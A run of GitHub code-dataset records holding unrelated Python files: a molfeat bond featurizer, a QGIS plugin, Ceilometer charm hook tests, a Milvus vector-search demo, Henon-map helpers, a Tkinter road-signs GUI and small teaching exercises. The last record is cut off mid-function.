cls_name)\n\n kwargs = state_dict[\"args\"].copy()\n # now we need to unpickle the featurizer functions\n featurizer_fn_pickled = kwargs.pop(\"featurizer_funcs\", None)\n if featurizer_fn_pickled is not None:\n featurizer_fn_loaded = {}\n for k, v in featurizer_fn_pickled.items():\n featurizer_fn_loaded[k] = hex_to_fn(v)\n kwargs[\"featurizer_funcs\"] = featurizer_fn_loaded\n\n pairwise_atom_fn_pickled = kwargs.pop(\"pairwise_atom_funcs\", None)\n if pairwise_atom_fn_pickled is not None:\n pairwise_atom_fn_loaded = {}\n for k, v in pairwise_atom_fn_pickled.items():\n pairwise_atom_fn_loaded[k] = hex_to_fn(v)\n kwargs[\"pairwise_atom_funcs\"] = pairwise_atom_fn_loaded\n kwargs.update(**(override_args or {}))\n return klass(**kwargs)\n\n def feat_size(self, feat_name: Optional[str] = None):\n \"\"\"Get the feature size for ``feat_name``.\n\n Args:\n feat_name: Feature for query.\n\n Returns:\n int: Feature size for the feature with name ``feat_name``. Default to None.\n \"\"\"\n if feat_name not in self.featurizer_funcs and feat_name not in self.pairwise_atom_funcs:\n raise ValueError(\n \"Expect feat_name to be in {}, got {}\".format(\n list(self.featurizer_funcs.keys()), feat_name\n )\n )\n if feat_name not in self._feat_sizes:\n if feat_name in self.featurizer_funcs:\n bond = self._toy_mol.GetBondWithIdx(0)\n self._feat_sizes[feat_name] = len(self.featurizer_funcs[feat_name](bond))\n elif feat_name in self.pairwise_atom_funcs:\n self._feat_sizes[feat_name] = self.pairwise_atom_funcs[feat_name](\n self._toy_mol\n ).shape[-1]\n else:\n raise ValueError(f\"Feature name {feat_name} is not defined !\")\n return self._feat_sizes[feat_name]\n\n def __call__(self, mol: Union[dm.Mol, str], dtype: Callable = None, flat: bool = True):\n \"\"\"Featurize all bonds in a molecule.\n\n Args:\n mol: the molecule of interest\n dtype: requested data type\n flat: whether to return a collapsed N^2, M or a N, N, M matrix\n\n Returns:\n dict: For each function in self.featurizer_funcs with the key ``k``,\n store the computed feature under the key ``k``.\n \"\"\"\n\n mol = dm.to_mol(mol)\n num_bonds = mol.GetNumBonds()\n num_atoms = mol.GetNumAtoms()\n feat_size = len(self)\n edge_matrix = None\n\n if self.pairwise_atom_funcs is not None:\n feat_size -= sum(self._feat_sizes[x] for x in self.pairwise_atom_funcs.keys())\n if self.featurizer_funcs is not None and len(self.featurizer_funcs) > 0:\n edge_matrix = np.zeros((num_atoms, num_atoms, feat_size))\n # Compute features for each bond\n for i in range(num_bonds):\n bond = mol.GetBondWithIdx(i)\n a_idx_1 = bond.GetBeginAtomIdx()\n a_idx_2 = bond.GetEndAtomIdx()\n bond_features = defaultdict(list)\n for feat_name, feat_func in self.featurizer_funcs.items():\n feat = feat_func(bond)\n bond_features[feat_name].extend([feat])\n bond_features = self._concat(bond_features)[self.name]\n edge_matrix[a_idx_1, a_idx_2] = bond_features\n edge_matrix[a_idx_2, a_idx_1] = bond_features\n\n edge_matrix = edge_matrix.reshape(-1, feat_size)\n if self.pairwise_atom_funcs is not None:\n pwise_features = dict()\n for pname, pfunc in self.pairwise_atom_funcs.items():\n pwise_features[pname] = pfunc(mol)\n pwise_features = self._concat(pwise_features)[self.name]\n if edge_matrix is not None:\n edge_matrix = np.concatenate([edge_matrix, pwise_features], axis=-1)\n else:\n edge_matrix = pwise_features\n if not flat:\n edge_matrix = edge_matrix.reshape(num_atoms, num_atoms, -1)\n if dtype is not None:\n edge_matrix = datatype.cast(edge_matrix, dtype=dtype)\n return {self.name: edge_matrix}\n\n\nclass DGLCanonicalBondCalculator(BondCalculator):\n DEFAULT_FEATURIZER = {\n \"bond_type_one_hot\": bond_type_one_hot,\n \"bond_is_conjugated\": bond_is_conjugated,\n \"bond_is_in_ring\": bond_is_in_ring,\n \"bond_stereo_one_hot\": bond_stereo_one_hot,\n }\n\n def _concat(self, data_dict: Dict[str, Iterable]):\n \"\"\"Concatenate the data into a single value\n\n Args:\n data_dict: mapping of feature names to tensor/arrays\n Returns:\n concatenated_dict: a dict with a single key where all array have been concatenated\n \"\"\"\n return concat_dict(data_dict, new_name=self.name, order=list(self.featurizer_funcs.keys()))\n\n\nclass DGLWeaveEdgeCalculator(EdgeMatCalculator):\n \"\"\"Edge featurizer used by WeaveNets\n\n The edge featurization is introduced in `Molecular Graph Convolutions:\n Moving Beyond Fingerprints `__.\n\n This featurization is performed for a complete graph of atoms with self loops added,\n which considers the following default:\n\n * Number of bonds between each pairs of atoms\n * One-hot encoding of bond type if a bond exists between a pair of atoms\n * Whether a pair of atoms belongs to a same ring\n\n \"\"\"\n\n DEFAULT_FEATURIZER = {}\n DEFAULT_PAIRWISE_FEATURIZER = {\n \"pairwise_dist_indicator\": pairwise_dist_indicator,\n \"pairwise_bond_indicator\": pairwise_bond_indicator,\n \"pairwise_ring_membership\": pairwise_ring_membership,\n }\n\n def _concat(self, data_dict: Dict[str, Iterable]):\n \"\"\"Concatenate the data into a single value\n\n Args:\n data_dict: mapping of feature names to tensor/arrays\n Returns:\n concatenated_dict: a dict with a single key where all array have been concatenated\n \"\"\"\n\n # To reproduce DGLDefault, we need to keep the order of dict insertion\n return concat_dict(\n data_dict, new_name=self.name, order=list(self.pairwise_atom_funcs.keys())\n )\n","repo_name":"datamol-io/molfeat","sub_path":"molfeat/calc/bond.py","file_name":"bond.py","file_ext":"py","file_size_in_byte":19048,"program_lang":"python","lang":"en","doc_type":"code","stars":131,"dataset":"github-code","pt":"32"} +{"seq_id":"7236826895","text":"__author__ = 'Ben Hur S. Pintor '\n__date__ = '01/03/2017'\n\nfrom PyQt4.QtGui import *\nfrom PyQt4.QtCore import *\nfrom PyQt4 import uic\nfrom qgis.core import *\nimport os\n\n\nclass MHCVAM:\n \"\"\"QGIS plugin implementation\"\"\"\n\n def __init__(self, iface):\n \"\"\"Constructor.\n\n :param iface: An interface instance that will be passed to this class\n which provides the hook by which you can manipulate the QGIS\n application at run time.\n :type iface: QgsInterface\n \"\"\"\n # Save reference to the QGIS interface\n self.iface = iface\n\n # initialize plugin directory\n self.plugin_dir = os.path.dirname(__file__)\n\n # initialize locale\n locale = QSettings().value('locale/userLocale')[0:2]\n locale_path = os.path.join(\n self.plugin_dir,\n 'i18n',\n 'MHCVAM_{}.qm'.format(locale))\n\n if os.path.exists(locale_path):\n self.translator = QTranslator()\n self.translator.load(locale_path)\n\n if qVersion() > '4.3.3':\n QCoreApplication.installTranslator(self.translator)\n\n # Declare instance attributes\n self.action_mhcvam_unicef_indicators = None\n self.action_mhcvam_unicef_indicators_household = None\n self.action_mhcvam_barangay = None\n self.action_mhcvam_household = None\n self.action_mhcvam_infrastructures = None\n self.actions = []\n self.menu = self.tr(u'&MHCVAM')\n\n # Create a dockable toolbar aside from the Menu in \"Plugins\"\n self.toolbar = self.iface.addToolBar(u'MHCVAM')\n self.toolbar.setObjectName(u'MHCVAM')\n\n\n def tr(self, message):\n \"\"\"Get the translation for a string using Qt translation API.\n\n We implement this ourselves since we do not inherit QObject.\n\n :param message: String for translation.\n :type message: str, QString\n\n :returns: Translated version of message.\n :rtype: QString\n \"\"\"\n # noinspection PyTypeChecker,PyArgumentList,PyCallByClass\n return QCoreApplication.translate('MHCVAM', message)\n\n\n def add_action(self, action, add_to_toolbar=True):\n \"\"\"Add the action to the MHCVAM toolbar\n\n :param action: The action that should be added to the toolbar.\n :type action: QAction\n\n :param add_to_toolbar: Flag indicating whether the action should also\n be added to the MHCVAM toolbar. Defaults to True.\n :type add_to_toolbar: bool\n\n \"\"\"\n # store in the class list of actions for easy plugin unloading\n self.actions.append(action)\n self.iface.addPluginToMenu(self.tr('MHCVAM'), action)\n if add_to_toolbar:\n self.toolbar.addAction(action)\n\n\n def initGui(self):\n \"\"\"Gui initialisation procedure (for QGIS plugin api).\n\n .. note:: Don't change the name of this method from initGui!\n\n This method is called by QGIS and should be used to set up\n any graphical user interface elements that should appear in QGIS by\n default (i.e. before the user performs any explicit action with the\n plugin).\n \"\"\"\n\n # Create a dockable toolbar aside from the Menu in \"Plugins\"\n self.toolbar = self.iface.addToolBar('MHCVAM')\n self.toolbar.setObjectName('MHCVAMToolBar')\n\n # Create the Menu in \"Plugins\"\n self._create_mhcvam_unicef_indicators_action()\n self._create_mhcvam_unicef_indicators_household_action()\n self._create_mhcvam_barangay_action()\n self._create_mhcvam_household_action()\n self._create_mhcvam_infrastructures_action()\n\n\n def unload(self):\n \"\"\"Removes the plugin menu item and icon from QGIS GUI.\"\"\"\n\n for action in self.actions:\n self.iface.removePluginMenu(\n self.tr(u'&MHCVAM'),\n action)\n self.iface.removeToolBarIcon(action)\n self.iface.unregisterMainWindowAction(action)\n\n # remove the toolbar\n self.iface.mainWindow().removeToolBar(self.toolbar)\n\n\n '''Child-centered Indicators Methods'''\n def _create_mhcvam_unicef_indicators_action(self):\n \"\"\"Create action for MHCVAM using Child-centered Indicators\"\"\"\n\n icon = os.path.dirname(__file__) + '/img/icons/icon-unicef-indicators.png'\n self.action_mhcvam_unicef_indicators = QAction(\n QIcon(icon),\n self.tr('MHCVAM using Child-centered Indicators (BARANGAY)'),\n self.iface.mainWindow())\n self.action_mhcvam_unicef_indicators.setStatusTip(\n self.tr('MHCVAM using Child-centered Indicators (BARANGAY)'))\n self.action_mhcvam_unicef_indicators.setWhatsThis(\n self.tr('Perform MHCVAM using Child-centered Indicators (BARANGAY)'))\n self.action_mhcvam_unicef_indicators.triggered.connect(\n self.mhcvam_unicef_indicators)\n self.add_action(\n self.action_mhcvam_unicef_indicators)\n\n\n def _create_mhcvam_unicef_indicators_household_action(self):\n \"\"\"Create action for MHCVAM using Child-centered Indicators (Household)\"\"\"\n\n icon = os.path.dirname(__file__) + '/img/icons/icon-unicef-indicators-household.png'\n self.action_mhcvam_unicef_indicators_household = QAction(\n QIcon(icon),\n self.tr('MHCVAM using Child-centered Indicators (HOUSEHOLD)'),\n self.iface.mainWindow())\n self.action_mhcvam_unicef_indicators_household.setStatusTip(\n self.tr('MHCVAM using Child-centered Indicators (HOUSEHOLD)'))\n self.action_mhcvam_unicef_indicators_household.setWhatsThis(\n self.tr('Perform MHCVAM using Child-centered Indicators (HOUSEHOLD)'))\n self.action_mhcvam_unicef_indicators_household.triggered.connect(\n self.mhcvam_unicef_indicators_household)\n self.add_action(\n self.action_mhcvam_unicef_indicators_household)\n\n\n def mhcvam_unicef_indicators(self):\n \"\"\"Show dialog for MHCVAM using Child-centered Indicators\"\"\"\n\n from mhcvam_unicef_indicators_dialog import MHCVAMUnicefIndicatorsDialog\n\n # Run only if there are layers already loaded into QGIS\n if len(QgsMapLayerRegistry.instance().mapLayers()) > 0:\n dialog = MHCVAMUnicefIndicatorsDialog(\n self.iface.mainWindow(),\n self.iface)\n dialog.exec_()\n\n else:\n msg = \"NO LAYERS FOUND.\\n\\nAdd layers first before running the plugin.\"\n QMessageBox.critical(self.iface.mainWindow(), \"WARNING\", msg)\n\n\n def mhcvam_unicef_indicators_household(self):\n \"\"\"Show dialog for MHCVAM using Child-centered Indicators (Household)\"\"\"\n\n # from mhcvam_unicef_indicators_household_dialog import MHCVAMUnicefIndicatorsHouseholdDialog\n from mhcvam_unicef_indicators_household_dialog import MHCVAMUnicefIndicatorsHouseholdDialog\n\n # Run only if there are layers already loaded into QGIS\n if len(QgsMapLayerRegistry.instance().mapLayers()) > 0:\n dialog = MHCVAMUnicefIndicatorsHouseholdDialog(\n self.iface.mainWindow(),\n self.iface)\n dialog.exec_()\n\n else:\n msg = \"NO LAYERS FOUND.\\n\\nAdd layers first before running the plugin.\"\n QMessageBox.critical(self.iface.mainWindow(), \"WARNING\", msg)\n\n\n '''Household Methods'''\n def _create_mhcvam_household_action(self):\n \"\"\"Create action for Household-level Hazard and Vulnerability Analysis\"\"\"\n\n icon = os.path.dirname(__file__) + '/img/icons/icon-household.png'\n self.action_mhcvam_household = QAction(\n QIcon(icon),\n self.tr('Household-level Hazard and Vulnerability Analysis'),\n self.iface.mainWindow())\n self.action_mhcvam_household.setStatusTip(\n self.tr('Household-level Hazard and Vulnerability Analysis'))\n self.action_mhcvam_household.setWhatsThis(\n self.tr('Perform Household-level Hazard and Vulnerability Analysis'))\n self.action_mhcvam_household.triggered.connect(\n self.mhcvam_household)\n self.add_action(\n self.action_mhcvam_household)\n\n\n def mhcvam_household(self):\n \"\"\"Show dialog for Household-level Hazard and Vulnerability Analysis\"\"\"\n\n from mhcvam_household_dialog import MHCVAMHouseholdDialog\n\n # Run only if there are layers already loaded into QGIS\n if len(QgsMapLayerRegistry.instance().mapLayers()) > 0:\n dialog = MHCVAMHouseholdDialog(\n self.iface.mainWindow(),\n self.iface)\n dialog.exec_()\n\n else:\n msg = \"NO LAYERS FOUND.\\n\\nAdd layers first before running the plugin.\"\n QMessageBox.critical(self.iface.mainWindow(), \"WARNING\", msg)\n\n\n '''Barangay Methods'''\n def _create_mhcvam_barangay_action(self):\n \"\"\"Create action for Barangay-level Hazard and Vulnerability Analysis\"\"\"\n\n icon = os.path.dirname(__file__) + '/img/icons/icon-barangay.png'\n self.action_mhcvam_barangay = QAction(\n QIcon(icon),\n self.tr('Barangay-level Hazard and Vulnerability Analysis'),\n self.iface.mainWindow())\n self.action_mhcvam_barangay.setStatusTip(\n self.tr('Barangay-level Hazard and Vulnerability Analysis'))\n self.action_mhcvam_barangay.setWhatsThis(\n self.tr('Perform Barangay-level Hazard and Vulnerability Analysis'))\n self.action_mhcvam_barangay.triggered.connect(\n self.mhcvam_barangay)\n self.add_action(\n self.action_mhcvam_barangay)\n\n\n def mhcvam_barangay(self):\n \"\"\"Show dialog for Barangay-level Hazard and Vulnerability Analysis\"\"\"\n\n from mhcvam_barangay_dialog import MHCVAMBarangayDialog\n\n # Run only if there are layers already loaded into QGIS\n if len(QgsMapLayerRegistry.instance().mapLayers()) > 0:\n dialog = MHCVAMBarangayDialog(\n self.iface.mainWindow(),\n self.iface)\n dialog.exec_()\n\n else:\n msg = \"NO LAYERS FOUND.\\n\\nAdd layers first before running the plugin.\"\n QMessageBox.critical(self.iface.mainWindow(), \"WARNING\", msg)\n\n\n '''Infrastructures Methods'''\n def _create_mhcvam_infrastructures_action(self):\n \"\"\"Create action for Infrastructures Hazard Analysis\"\"\"\n\n icon = os.path.dirname(__file__) + '/img/icons/icon-infrastructures.png'\n self.action_mhcvam_infrastructures = QAction(\n QIcon(icon),\n self.tr('Infrastructures Hazard Analysis'),\n self.iface.mainWindow())\n self.action_mhcvam_infrastructures.setStatusTip(\n self.tr('Infrastructures Hazard Analysis'))\n self.action_mhcvam_infrastructures.setWhatsThis(\n self.tr('Perform Infrastructures Hazard Analysis'))\n self.action_mhcvam_infrastructures.triggered.connect(\n self.mhcvam_infrastructures)\n self.add_action(\n self.action_mhcvam_infrastructures)\n\n\n def mhcvam_infrastructures(self):\n \"\"\"Show dialog for Infratructures Hazard Analysis\"\"\"\n\n from mhcvam_infrastructures_dialog import MHCVAMInfrastructuresDialog\n\n # Run only if there are layers already loaded into QGIS\n if len(QgsMapLayerRegistry.instance().mapLayers()) > 0:\n dialog = MHCVAMInfrastructuresDialog(\n self.iface.mainWindow(),\n self.iface)\n dialog.exec_()\n\n else:\n msg = \"NO LAYERS FOUND.\\n\\nAdd layers first before running the plugin.\"\n QMessageBox.critical(self.iface.mainWindow(), \"WARNING\", msg)\n","repo_name":"benhur07b/mhcvam","sub_path":"mhcvam.py","file_name":"mhcvam.py","file_ext":"py","file_size_in_byte":11739,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"14041319179","text":"import json\nfrom unittest.mock import patch\n\nimport ceilometer_utils\n\nwith patch('ceilometer_utils.register_configs'):\n with patch('ceilometer_utils.restart_map'):\n import ceilometer_hooks as hooks\n\nfrom test_utils import CharmTestCase\n\nTO_PATCH = [\n 'CONFIGS',\n 'apt_install',\n 'apt_update',\n 'filter_installed_packages',\n 'get_packages',\n 'releases_packages_map',\n 'services',\n 'is_relation_made',\n 'relation_set',\n 'update_nrpe_config',\n]\n\n\nclass CeilometerHooksTest(CharmTestCase):\n\n def setUp(self):\n super(CeilometerHooksTest, self).setUp(hooks, TO_PATCH)\n\n @patch('charmhelpers.core.hookenv.config')\n def test_install_hook(self, mock_config):\n ceil_pkgs = ['pkg1', 'pkg2']\n self.filter_installed_packages.return_value = ceil_pkgs\n hooks.hooks.execute(['hooks/install'])\n self.apt_update.assert_called_with(fatal=True)\n self.apt_install.assert_called_with(ceil_pkgs, fatal=True)\n\n @patch('charmhelpers.core.hookenv.config')\n def test_ceilometer_changed(self, mock_config):\n hooks.hooks.execute(['hooks/ceilometer-service-relation-changed'])\n self.assertTrue(self.CONFIGS.write_all.called)\n self.assertTrue(self.update_nrpe_config.called)\n\n @patch('charmhelpers.core.hookenv.config')\n def test_ceilometer_changed_no_nrpe(self, mock_config):\n self.is_relation_made.return_value = False\n\n hooks.hooks.execute(['hooks/ceilometer-service-relation-changed'])\n self.assertTrue(self.CONFIGS.write_all.called)\n self.assertFalse(self.update_nrpe_config.called)\n\n @patch('charmhelpers.core.hookenv.config')\n def test_nova_ceilometer_joined(self, mock_config):\n mocked_releases_packages_map = {\n 'ussuri': {\n 'deb': {\n 'install': [\n 'ceilometer-common', 'ceilometer-agent-compute',\n 'python3-ceilometer', 'python3-memcache'],\n 'purge': ['python-ceilometer'],\n }}}\n mocked_services = ['ceilometer-agent-compute']\n\n self.releases_packages_map.return_value = mocked_releases_packages_map\n self.services.return_value = mocked_services\n hooks.hooks.execute(['hooks/nova-ceilometer-relation-joined'])\n self.relation_set.assert_called_with(\n relation_id=None,\n relation_settings={\n 'subordinate_configuration': json.dumps(\n ceilometer_utils.NOVA_SETTINGS),\n 'releases-packages-map': json.dumps(\n mocked_releases_packages_map, sort_keys=True),\n 'services': json.dumps(mocked_services)})\n\n @patch('charmhelpers.core.hookenv.config')\n def test_config_changed(self, mock_config):\n self.is_relation_made.return_value = True\n self.filter_installed_packages.return_value = ['pkg1', 'pkg2']\n hooks.hooks.execute(['hooks/config-changed'])\n self.update_nrpe_config.assert_called_once_with()\n self.CONFIGS.write_all.assert_called_once_with()\n self.apt_install.assert_called_once_with(['pkg1', 'pkg2'], fatal=True)\n self.is_relation_made.assert_called_once_with('nrpe-external-master')\n\n @patch('charmhelpers.core.hookenv.config')\n def test_config_changed_no_nrpe(self, mock_config):\n self.is_relation_made.return_value = False\n self.filter_installed_packages.return_value = ['pkg1', 'pkg2']\n hooks.hooks.execute(['hooks/config-changed'])\n self.assertFalse(self.update_nrpe_config.called)\n self.CONFIGS.write_all.assert_called_once_with()\n self.apt_install.assert_called_once_with(['pkg1', 'pkg2'], fatal=True)\n self.is_relation_made.assert_called_once_with('nrpe-external-master')\n","repo_name":"openstack/charm-ceilometer-agent","sub_path":"unit_tests/test_ceilometer_hooks.py","file_name":"test_ceilometer_hooks.py","file_ext":"py","file_size_in_byte":3797,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"32"} +{"seq_id":"17677400249","text":"#!/usr/bin/env python\n\ndef create_html_page(cid, category_list):\n \"\"\"\n Create an html file with given cid as name, and category_list as data.\n :param cid (int): category id\n :param category_list (list): list of record lists.\n \"\"\"\n\n html = \"\"\n\n html += \"

Category Tree Rooted at ID: {}

\".format(cid)\n\n html += \"\"\n html += create_html_list(category_list)\n html += \"\"\n html += \"\"\n\n f = open(str(cid) +\".html\", \"w+\", encoding='utf-8')\n f.write(html)\n f.close()\n\n\ndef create_html_list(category_list):\n \"\"\"\n Create an html list recursively using arg data\n\n :param category_list (list): list of category data\n\n :return (str): html script of recursive ul\n \"\"\"\n\n html_list = \"
    \"\n\n for item in category_list:\n if isinstance(item, list):\n html_list += create_html_list(item)\n else:\n html_list += \"
  • ID: {} Name: {} OfferEnable: {}
  • \\n\".format(item[0], item[2], \"True\" if item[3] else \"False\")\n\n html_list += \"
\\n\"\n\n return html_list\n","repo_name":"vivekpabani/EbayCategoryTree","sub_path":"create_html.py","file_name":"create_html.py","file_ext":"py","file_size_in_byte":1093,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"11987792008","text":"#### conda env vicuna\n\nfrom pymilvus import (\n connections,\n utility,\n FieldSchema,\n CollectionSchema,\n DataType,\n Collection,\n)\n\nconnections.connect(\"default\", host=\"xxx.xxx.xxx.xxx\", port=\"19530\")\n\n## https://github.com/milvus-io/milvus/issues/19090\nfields = [\n FieldSchema(name=\"pk\", dtype=DataType.INT64, is_primary=True, auto_id=False),\n FieldSchema(name=\"random\", dtype=DataType.VARCHAR, max_length=65535 ), # DataType.DOUBLE DataType.VARCHAR\n FieldSchema(name=\"embeddings\", dtype=DataType.FLOAT_VECTOR, dim=8)\n]\nschema = CollectionSchema(fields, \"hello_milvus is the simplest demo\")\nhello_milvus = Collection(\"hello_milvus\", schema)\n\nimport random\n\nmax_len=10\nentities = [\n [i for i in range(max_len)], # field pk\n [str('A_')+str(float(random.randrange(-20, -10))) for _ in range(max_len)], # field random in varchar\n # [float(random.randrange(-20, -10)) for _ in range(max_len)], # field random\n [[random.random() for _ in range(8)] for _ in range(max_len)], # field embeddings\n]\n\nprint(' entities : ',entities)\n\n\ninsert_result = hello_milvus.insert(entities)\n# # After final entity is inserted, it is best to call flush to have no growing segments left in memory\nhello_milvus.flush() \n\n### Description of parameters in index creation\n### ref: https://milvus.io/docs/build_index.md\n### ref: https://milvus.io/docs/index.md\nindex = {\n \"index_type\": \"IVF_FLAT\",\n \"metric_type\": \"L2\",\n \"params\": {\"nlist\": 128},\n}\nhello_milvus.create_index(\"embeddings\", index)\n\n\nhello_milvus.load()\nprint(' shape : ',len(entities), ' ---> ',len(entities[0]))\nvectors_to_search = entities[-1][-1:]\ntext_=entities[1][-1:]\nprint( ' query : ',vectors_to_search)\nprint( ' text : ',text_)\n\nsearch_params = {\n \"metric_type\": \"L2\",\n \"params\": {\"nprobe\": 10},\n}\nresult = hello_milvus.search(vectors_to_search, \"embeddings\", search_params, limit=3, output_fields=[\"random\"])\nprint(' 1 ===> ',result)\n\n# result = hello_milvus.query(expr=\"random > -14\",limit=3, output_fields=[\"random\", \"embeddings\"])\n# print(' 2 ===> ',result)\n\n# result = hello_milvus.search(vectors_to_search, \"embeddings\", search_params, limit=3, expr=\"random > -12\", output_fields=[\"random\"])\n# print(' 3 ===> ',result)\n\n\n### Delete content in collection\n# expr = \"\"\"pk in [0,3000]\"\"\"\n# hello_milvus.delete(expr)\n\n#### Drop database\n# utility.drop_collection(\"hello_milvus\")\n\n\n","repo_name":"hkbtotw/Openai-X-Milvus-Question-Answer-with-Custom-Knowledge","sub_path":"test_pymilvus_ver1.py","file_name":"test_pymilvus_ver1.py","file_ext":"py","file_size_in_byte":2394,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"8804844133","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Feb 24 14:03:58 2023\n\n@author: sabo4ever\n\"\"\"\n\nimport numpy as np\nfrom numba import njit\nimport pandas as pd\n\n\n@njit\ndef hanning_window(x):\n return x * 2 * np.power((np.sin(np.pi * np.arange(len(x)) / (len(x)) )), 2)\n@njit\ndef A(a, b, c):\n return (-(a + b * c) * (a - b) + b * np.sqrt(c**2 * (a + b)**2 - 2 * a * b * (2 * c**2 - c - 1))) / (a**2 + b**2 + 2 * a * b * c)\n@njit\ndef interpolation(data):\n index = np.argmax(data)\n N=len(data)\n \n if index==0:\n return 0.0\n elif (index== N-1):\n return 1.0\n if (data[index - 1] > data[index + 1]):\n i1 = index - 1\n i2 = index\n index = index - 1\n else:\n i1 = index\n i2 = index + 1\n value= (index/N)+(1.0/(2.0*np.pi))*np.arcsin(A(data[i1], data[i2], np.cos(2.0*np.pi/N)) * np.sin(2.0*np.pi/N))\n return abs(value)\n \n\ndef fft_tune(x,px,alf,beta):\n xn=x/np.sqrt(beta)\n pxn=alf*x/np.sqrt(beta) + px*np.sqrt(beta)\n xn=hanning_window(xn)\n pxn=hanning_window(pxn)\n coords=xn - 1j * pxn\n freqs=np.fft.fft(coords)\n return interpolation(abs(freqs))\n\ndef quad_func(x,a2,a0):\n return a2*np.square(x)+a0\n\n\ndef cart2pol(x, y):\n rho = np.sqrt(x**2 + y**2)\n phi = np.arctan2(y, x)\n return(rho, phi)\n\ndef trig_area(x1, y1, x2, y2, x3, y3):\n # calculate the area using the formula above\n area = 0.5 * abs(x1*(y2-y3) + x2*(y3-y1) + x3*(y1-y2))\n return area\n\ndef shape_area(x,px,x0=0,px0=0):#need to have shape centred around 0,0. orelse coords not ordered right\n r,theta = cart2pol(x,px)\n data = {\"theta\":theta,\"r\":r}\n polar = pd.DataFrame(data=data)\n polar = polar.sort_values(by=\"theta\")\n \n x_re = list(polar.r*np.cos(polar.theta))\n px_re = list(polar.r*np.sin(polar.theta))\n \n area=0\n for j in range (len(r)-1):\n area += trig_area(x0, px0, x_re[j], px_re[j], x_re[j+1], px_re[j+1])\n \n return area","repo_name":"sabrinawaa/Sabrina-Project","sub_path":"henon_funcs.py","file_name":"henon_funcs.py","file_ext":"py","file_size_in_byte":1962,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"33451498291","text":"from functools import partial as pto\nfrom tkinter import Tk, Button, X, messagebox\n\nWARN = 'warn'\nCRITICAL = 'critical'\nREGULAR = 'regular'\n\n# define the SIGNS levels\nSIGNS = {\n 'do not enter': CRITICAL,\n 'railroad crossing': WARN,\n '55\\nspeed limit': REGULAR,\n 'wrong way': CRITICAL,\n 'merging traffic': WARN,\n 'one way': REGULAR,\n}\n\ndef critical_msg():\n return messagebox.showerror('Error', 'Error Button Pressed!')\n\ndef warn_msg():\n return messagebox.showwarning('Warning', 'Warning Button Pressed!')\n\ndef info_msg():\n return messagebox.showinfo('Info', 'Info Button Pressed!')\n# critical_msg = lambda: messagebox.showerror('Error', 'Error Button Pressed!')\n# warn_msg = lambda: messagebox.showwarning('Warning','Warning Button Pressed!')\n# info_msg = lambda: messagebox.showinfo('Info', 'Info Button Pressed!')\n\ntop = Tk()\ntop.title('Road Signs')\nButton(top, text='QUIT', command=top.quit, bg='red', fg='white').pack()\n\nmy_button = pto(Button, top)\n# Here is 2 level of partial\ncritical_button = pto(my_button, command=critical_msg, bg='white', fg='red')\nwarn_button = pto(my_button, command=warn_msg, bg='goldenrod1')\nregular_button = pto(my_button, command=info_msg, bg='white')\n\nfor eachSign in SIGNS:\n signType = SIGNS[eachSign]\n # In non-web environment, eval & for can be used to dynamically\n # generate expressions to execute\n cmd = '%s_button(text=%r%s).pack(fill=X, expand=True)'%(\n signType, eachSign,\n '.upper()' if signType == CRITICAL else '.title()')\n eval(cmd)\n\ntop.mainloop()\n\n\n","repo_name":"c4fun/core-python-programming","sub_path":"ch19 GUI Programming/pfaGUI2.py","file_name":"pfaGUI2.py","file_ext":"py","file_size_in_byte":1554,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"35016295495","text":"class Estudiante:\n def __init__(self, nombre, edad, grado):\n self.nombre = nombre\n self.edad = edad\n self.grado = grado\n\nclass RegistroEstudiantes:\n def __init__(self):\n self.estudiantes = []\n self.cantidad = 0\n\n def agregar_estudiante(self, estudiante):\n self.estudiantes.append(estudiante)\n self.cantidad += 1\n\n def mostrar_estudiantes(self):\n print(\"Estudiantes en el registro:\")\n for estudiante in self.estudiantes:\n print(f\"Nombre: {estudiante.nombre}, Edad: {estudiante.edad}, Grado: {estudiante.grado}\")\n\n def buscar_estudiante(self, nombre):\n for estudiante in self.estudiantes:\n if estudiante.nombre == nombre:\n print(f\"Detalles del estudiante {nombre}:\")\n print(f\"Edad: {estudiante.edad}\")\n print(f\"Grado: {estudiante.grado}\")\n return\n print(f\"No se encontró al estudiante {nombre} en el registro.\")\n\n def eliminar_estudiante(self, nombre):\n for estudiante in self.estudiantes:\n if estudiante.nombre == nombre:\n self.estudiantes.remove(estudiante)\n self.cantidad -= 1\n print(f\"El estudiante {nombre} ha sido eliminado del registro.\")\n return\n print(f\"No se encontró al estudiante {nombre} en el registro.\")\n\n\n# Crear un objeto RegistroEstudiantes\nregistro = RegistroEstudiantes()\n\n# Crear objetos Estudiante\nestudiante1 = Estudiante(\"Pablo\", 15, 9)\nestudiante2 = Estudiante(\"María\", 16, 10)\nestudiante3 = Estudiante(\"Jaime\", 14, 8)\n\n# Agregar estudiantes al registro\nregistro.agregar_estudiante(estudiante1)\nregistro.agregar_estudiante(estudiante2)\nregistro.agregar_estudiante(estudiante3)\n\n# Mostrar los estudiantes en el registro\nregistro.mostrar_estudiantes()\n\n# Buscar un estudiante por nombre\nregistro.buscar_estudiante(\"María\")\n\n# Eliminar un estudiante por nombre\nregistro.eliminar_estudiante(\"Juan\")\n\n# Mostrar los estudiantes actualizados en el registro\nregistro.mostrar_estudiantes()\n","repo_name":"JaimeNevado/Docencia-Clases-Particulares","sub_path":"ClasesPablo/Ejercicios 7/ejercicio1.py","file_name":"ejercicio1.py","file_ext":"py","file_size_in_byte":2070,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"15594748358","text":"def citire(n):\n v = []\n for i in range(0,n):\n x = int(input(\"dati elemnt: \"))\n v.append(x)\n return v\ndef cifre(a,b):\n v1 = [0,0,0,0,0,0,0,0,0,0]\n v2 = [0,0,0,0,0,0,0,0,0,0]\n cont = 0\n \n while a > 0:\n v1[a%10] = v1[a%10] + 1\n a=int(a/10)\n while b > 0:\n v2[b%10] = v2[b%10] + 1\n b = int(b/10)\n for i in range(0,10):\n if(v1[i] 